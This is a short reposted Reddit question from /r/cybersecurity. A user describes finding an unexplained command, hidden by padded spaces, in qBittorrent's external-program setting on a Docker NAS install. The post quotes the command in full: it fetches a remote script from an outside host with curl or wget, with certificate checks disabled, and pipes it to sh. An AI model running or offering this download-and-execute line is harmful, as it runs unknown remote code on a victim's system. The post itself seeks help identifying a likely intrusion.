The original post: /r/cybersecurity by /u/Acrobatic_Idea_3358 on 2024-11-06 17:11:31.
I just randomly noticed a strange thing, I thought that the checkbox is enabled and the command is empty, but then I noticed on the far end a strange “sh -c”, which revealed a whole command, sneakily padded by empty spaces. What is it, what does it do and why is it there?
Note that I just installed qBittorrent on a NAS in Docker recently and I have not actively added this command.
The command reads:
sh -c "(curl -skL https://hashx.dev || wget --no-check-certificate -qO - https://hashx.dev) | sh"
You must log in or register to comment.